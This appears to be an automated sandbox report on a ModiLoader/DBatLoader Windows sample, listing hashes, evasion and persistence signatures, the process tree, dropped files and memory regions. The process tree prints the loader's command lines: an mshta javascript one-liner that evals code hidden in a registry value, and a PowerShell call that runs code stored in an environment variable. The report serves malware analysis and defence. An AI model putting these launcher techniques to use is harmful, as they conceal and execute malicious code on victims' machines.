Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
-
submitted
20-05-2024 17:08
General
-
Target
603cb6a2a80f48ffd0865819a87d6dc4_JaffaCakes118.exe
-
Size
308KB
-
MD5
603cb6a2a80f48ffd0865819a87d6dc4
-
SHA1
4b4b5e44e27e2017c1ca4f2c2fd62955cdf6f2cf
-
SHA256
221c74ea97e309521b52edecbe8f0f03d1d0bb4ba0f76ee203b25dc844a962ca
-
SHA512
cb13e491e14955bd7bc11f6b2c243368a5c3571f5601eb292965e34652b6cbfa33ff6aa140886b4cb50ab1031fc60d7084cebcab57b59427fb037516df360710
-
SSDEEP
6144:0DUcUv8LnHRzyPGcw+wRyITvyGJiFpxTR:0DU1ELnHRzyU+fIOBFl
Malware Config
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
-
Looks for VirtualBox drivers on disk 2 TTPs 1 IoCs
-
ModiLoader Second Stage 60 IoCs
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Deletes itself 1 IoCs
-
Drops startup file 1 IoCs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies registry class 7 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 31 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\603cb6a2a80f48ffd0865819a87d6dc4_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\603cb6a2a80f48ffd0865819a87d6dc4_JaffaCakes118.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\603cb6a2a80f48ffd0865819a87d6dc4_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\603cb6a2a80f48ffd0865819a87d6dc4_JaffaCakes118.exe"2⤵
-
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" javascript:m0Nb9K="A";r0q=new%20ActiveXObject("WScript.Shell");UGbsM5Pw="74o2J1r";pW3M9f=r0q.RegRead("HKLM\\software\\Wow6432Node\\VKni6FS\\J2wwvBgmF");VQnk64rt="y0R";eval(pW3M9f);p2u6KfuT="m13";1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:nqaqpnxe2⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32.exe3⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VirtualBox drivers on disk
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Deletes itself
- Drops startup file
- Adds Run key to start application
- Maps connected drives based on registry
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\SysWOW64\regsvr32.exe"4⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\c55956\379df8.lnkFilesize
881B
MD54fd9c57959cbd96ea16787f85d55d88e
SHA1f9a5135af7b8afb02df348127284223e4b0ebd75
SHA2560e6ee30e0ebafc32306e2f2776f19fd18257ee7ce649278d98b9ef72e9fe8734
SHA512ebd39b584ea8a059962afb1a7e2f8048cae69c53ec67a65a25d74c30ad01a26c61c3e4ce617ad8c0065e18f5d736919d166f2db5329aae5da42545389fd200fa
-
C:\Users\Admin\AppData\Local\c55956\4f746e.925876aFilesize
6KB
MD5086316a15cc08d8057b59cfb55bdb60d
SHA1dd26234921bb28a238b50eb5a4f02d87b432f364
SHA2566c6ad2ebbac7268ab7959f3c8b0349895cf66ec59fd7a97f1d343bc613d98b6c
SHA5122de849d64a3fca51a27f5dfe9960599bcb58bbcc497ca09487b23d107ee60aca6d5f0c50148c4ffaa857f2acff0eb8be3aee97252be18858f80660d233f125c5
-
C:\Users\Admin\AppData\Local\c55956\ff1237.batFilesize
61B
MD5a4ee564ba17858e285c3daf96c530e67
SHA1c9d811ebf359babdd15ca5374ae6afb1b31401b8
SHA2569134562b968a0afd491534e7074a3ba744c630d819c4f0c199dc79668ad12e1a
SHA51274e316747b51b52cf8ccf57ed0f3c9a467c15d309d8de7fb905f918178d3b700d4a497e8cd9de355ee29a7a8faccec5bd3665896a96273176c0f07e343827124
-
C:\Users\Admin\AppData\Roaming\18be8e\b446ee.925876aFilesize
45KB
MD55b8d406328ca6401bc7ed34c9a6959fd
SHA156ab0b732dc132f6f14992b6a3ecc4257cef2306
SHA2568e631b65db92f00df8492ae3490bfe0173d7897f218170751ead2c98c08a157e
SHA512488ef3ac7b354853ad25a9ced34f11fffcbc3e6423ae5d193e542df922027c834472e388b8d0ab66ca12aed7c1cd8ac32b09fdb4acc022c8380e4e6f180fe9e1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a0815f.lnkFilesize
991B
MD53836aff622734c2528a16d0abe280fcb
SHA1f61f16dc3d3c0713f5920da106c4aa532a2a49da
SHA256e47ec287209d1a6057ddf96eb76092d06a81d1d1666f855a4b872de3030d6af9
SHA5126a2a201abfc55719ce0c01048df10aa60e1c07abe8bb587f1b8f63668bf8859a16573dbafcda1b19b556dd57fdb3ce7e2d885cb17ad4c65e0d35b844216cf8bd
-
memory/532-71-0x0000000000130000-0x0000000000271000-memory.dmpFilesize
1.3MB
-
memory/532-74-0x0000000000130000-0x0000000000271000-memory.dmpFilesize
1.3MB
-
memory/532-68-0x0000000000130000-0x0000000000271000-memory.dmpFilesize
1.3MB
-
memory/532-69-0x0000000000130000-0x0000000000271000-memory.dmpFilesize
1.3MB
-
memory/532-70-0x0000000000130000-0x0000000000271000-memory.dmpFilesize
1.3MB
-
memory/532-67-0x0000000000130000-0x0000000000271000-memory.dmpFilesize
1.3MB
-
memory/532-72-0x0000000000130000-0x0000000000271000-memory.dmpFilesize
1.3MB
-
memory/532-73-0x0000000000130000-0x0000000000271000-memory.dmpFilesize
1.3MB
-
memory/532-75-0x0000000000130000-0x0000000000271000-memory.dmpFilesize
1.3MB
-
memory/532-76-0x0000000000130000-0x0000000000271000-memory.dmpFilesize
1.3MB
-
memory/532-77-0x0000000000130000-0x0000000000271000-memory.dmpFilesize
1.3MB
-
memory/532-78-0x0000000000130000-0x0000000000271000-memory.dmpFilesize
1.3MB
-
memory/532-79-0x0000000000130000-0x0000000000271000-memory.dmpFilesize
1.3MB
-
memory/532-80-0x0000000000130000-0x0000000000271000-memory.dmpFilesize
1.3MB
-
memory/532-81-0x0000000000130000-0x0000000000271000-memory.dmpFilesize
1.3MB
-
memory/532-82-0x0000000000130000-0x0000000000271000-memory.dmpFilesize
1.3MB
-
memory/1652-28-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-37-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-34-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-41-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-40-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-59-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-58-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-57-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-56-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-55-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-54-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-66-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-49-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-48-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-46-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-45-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-44-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-43-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-42-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-39-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-38-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-30-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-36-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-33-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-32-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-47-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-31-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-23-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-27-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-25-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-35-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/1652-29-0x0000000000230000-0x0000000000371000-memory.dmpFilesize
1.3MB
-
memory/2748-26-0x00000000061F0000-0x00000000062C6000-memory.dmpFilesize
856KB
-
memory/2748-21-0x00000000061F0000-0x00000000062C6000-memory.dmpFilesize
856KB
-
memory/2988-2-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/2988-12-0x00000000007A0000-0x0000000000876000-memory.dmpFilesize
856KB
-
memory/2988-11-0x00000000007A0000-0x0000000000876000-memory.dmpFilesize
856KB
-
memory/2988-10-0x00000000007A0000-0x0000000000876000-memory.dmpFilesize
856KB
-
memory/2988-9-0x00000000007A0000-0x0000000000876000-memory.dmpFilesize
856KB
-
memory/2988-7-0x00000000007A0000-0x0000000000876000-memory.dmpFilesize
856KB
-
memory/2988-8-0x00000000007A0000-0x0000000000876000-memory.dmpFilesize
856KB
-
memory/2988-6-0x00000000007A0000-0x0000000000876000-memory.dmpFilesize
856KB
-
memory/2988-5-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB
-
memory/2988-4-0x0000000000400000-0x000000000043A000-memory.dmpFilesize
232KB